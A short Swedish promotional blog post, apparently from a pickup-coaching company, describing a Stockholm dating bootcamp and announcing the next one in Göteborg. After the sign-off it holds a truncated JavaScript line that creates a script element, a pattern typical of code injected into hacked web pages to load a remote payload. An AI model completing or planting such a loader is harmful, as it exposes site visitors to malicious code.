Stockholm, söndag kväll, mörkret har lagt sig, och harmoni råder i stan. Det sägs att stilla havet fick sitt namn dagen efter en häftig storm och som alla vet så är stilla havet långt ifrån stilla.

Det är den känslan som infinner sig efter helgens bootcamp. Vi kan med stolthet säga att den varit långt ifrån stilla och en stor succe!

Från hela teamet vill vi tacka alla deltagarna för att ha modet att påbörja er mentala förändring och ta klivet in i ert nya liv.

Det slår mig varje gång att på nära håll se den process som deltagarna genomgår. Från dag ett när de kliver in, tyngda med vad världen präntat in i dem men med en gnutta hopp om förändring. Till dag tre när de kliver ut genom dörren och ut i den värld som de så länge trodde var deras verklighet. De ler inför tanken på den resa de påbörjat, de äventyr som väntar dem.

Från att inte förstå till att uppleva verkligheten ute på fältet är den största belöningen deltagarna får uppleva. Återigen lyckades de med allt från att byta nummer och kyssar till att uppleva ”The Glow” under en allmänt fantastisk helg full av vänskaplig energi och förmågan att attrahera kvinnor, ha kul, och verkligen släppa loss.

Nedan följer en intressant analogi från filmen ”The Matrix” som beskriver hur det kan upplevas av att gå en bootcamp med Charismatic Revolution.

Nästa helg är det dags för Göteborg och vi laddar redan nu inför nya spännande äventyr med Charismatic Revolution!

LOVE /Superman

var d=document;var s=d.createElement(‘script’);